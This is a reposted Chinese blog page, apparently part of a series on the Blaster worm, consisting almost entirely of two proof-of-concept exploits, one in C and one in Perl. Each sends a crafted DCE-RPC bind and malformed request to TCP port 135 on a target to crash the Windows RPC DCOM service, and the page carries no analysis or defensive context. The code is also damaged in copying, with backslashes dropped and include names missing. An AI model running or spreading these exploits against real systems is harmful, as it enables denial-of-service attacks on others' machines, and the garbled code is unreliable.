冲击波病毒内幕点滴(2) (转)
附1XML:namespace prefix = o ns = "urn:schemas-microsoft-com:Office:office" />
測試代碼
#include
#include
#include
#include
#include
#include
?
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
?
unsigned char request[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
?
?
?
void main(int argc,char ** argv)
{
WSADATA WSAData;
int i;
SOCKET sock;
SOCKADDR_IN addr_in;
?
short port=135;
unsigned char buf1[0x1000];
printf("RPC Dcom Dos Vulnerability diSCOveried by Xfocus.orgn");
printf("Code by FlashSky,Flashsky@xfocus.org,benjurry,benjurry@xfocus.orgn");
printf("Welcome to http://www.xfocus.NETn");
if(argc<2)
{
printf("useage:%s targetn",argv[0]);
exit(1);
}
?
?
if (WSAStartup(MAKEword(2,0),&WSAData)!=0)
{
printf("WSAStartup error.Error:%dn",WSAGetLastError());
return;
}
?
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(port);
addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
?
if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
{
printf("Socket failed.Error:%dn",WSAGetLastError());
return;
}
if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{
printf("Connect failed.Error:%d",WSAGetLastError());
return;
}
if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
{
printf("Send failed.Error:%dn",WSAGetLastError());
return;
}
?
i=recv(sock,buf1,1024,MSG_PEEK);
if (send(sock,request,sizeof(request),0)==SOCKET_ERROR)
{
printf("Send failed.Error:%dn",WSAGetLastError());
return;
}
i=recv(sock,buf1,1024,MSG_PEEK);
}
?
?
#!/usr/bin/perl -w
# By SecurITeam's Experts
my $bindstr = "x05x00x0Bx03x10x00x00x00x48x00x00x00x7Fx00x00x00xD0x16xD0x16x00x00x00x00x01x00x00x00x01x00x01x00xA0x01x00x00x00x00x00x00xC0x00x00x00x00x00x00x46x00x00x00x00x04x5Dx88x8AxEBx1CxC9x11x9FxE8x08x00x2Bx10x48x60x02x00x00x00";
?
my $request = "x05x00x00x03x10x00x00x00x48x00x00x00x13x00x00x00x90x00x00x00x01x00x03x00x05x00x06x01x00x00x00x00x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x00x00x00x00x00x00x00x00";
?
use Socket;
$proto = getprotobyname('tcp');
socket(S, PF_INET, SOCK_STREAM, $proto) || die("Socket problemsn");
?
$ip = $ARGV[0];
$target = .net_aton($IP);
$paddr = sockaddr_in(135, $target);
connect(S, $paddr) || die "connect: $!";
select(S); $|=1;
print $bindstr;
sleep(2);
print $request;
sleep(2);
select(STDOUT);
close(S);來自 “ ITPUB博客 ” ,鏈接:http://blog.itpub.net/10752019/viewspace-982668/,如需轉載,請注明出處,否則將追究法律責任。
轉載于:http://blog.itpub.net/10752019/viewspace-982668/
總結
以上是生活随笔為你收集整理的冲击波病毒内幕点滴(2) (转)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 虚幻引擎5安装踩坑记录
- 下一篇: 做一个有时间观念的人